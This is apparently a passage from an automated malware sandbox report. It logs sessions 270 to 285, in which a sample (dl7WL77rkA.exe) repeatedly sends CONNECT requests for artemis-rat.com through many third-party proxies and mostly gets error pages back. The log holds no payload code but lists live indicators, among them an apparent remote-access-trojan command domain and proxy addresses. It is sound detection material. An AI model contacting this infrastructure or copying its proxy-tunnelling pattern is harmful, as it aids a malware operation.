                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            270192.168.2.55067638.162.17.16231283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.700908899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.149676085 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            271192.168.2.550764172.67.231.3803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.701327085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.855509043 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            272192.168.2.550686186.96.50.209993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.706351042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.232953072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.873648882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.913297892 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            273192.168.2.550771104.23.119.91803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.707282066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.861582994 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            274192.168.2.55060994.45.74.6080803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.718184948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            275192.168.2.55072720.118.1.11280003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.721568108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.920970917 CET176INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Length: 19
                                                                                                                                                                                                                                                            Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                                                                                                                                                            Data Ascii: 404 page not found


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            276192.168.2.55070938.162.8.17131283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.722676992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.171797037 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            277192.168.2.55065698.162.25.2341453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.728524923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            278192.168.2.550599103.200.135.22841453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.750897884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            279192.168.2.550650217.23.11.194327083876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.751988888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.049307108 CET226INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Length: 101
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            280192.168.2.55074738.162.6.18731283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.754793882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.188783884 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            281192.168.2.550802154.208.10.126803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.762784004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.923468113 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.23.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.1</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            282192.168.2.55079272.167.220.46288103876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.764067888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.201702118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.691128969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.670454979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.635797977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.694984913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.702579021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.608360052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.405179977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            283192.168.2.55063545.11.95.16560123876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.764070988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            284192.168.2.550655121.182.138.71803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.767456055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.067522049 CET340INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.073328972 CET339INData Raw: 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 31 31 20 4d 61 72 20 32 30 32 34 20 30 32 3a 33 30 3a 33 38 20 47 4d 54
                                                                                                                                                                                                                                                            Data Ascii: TTP/1.1 400 Bad RequestServer: nginx/1.12.2Date: Mon, 11 Mar 2024 02:30:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 173Connection: close<html><head><title>400 Bad Request</title></head><body bgcolor="white">


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            285192.168.2.55057843.231.22.229803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.775605917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.187432051 CET343INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 182
                                                                                                                                                                                                                                                            Connection: close
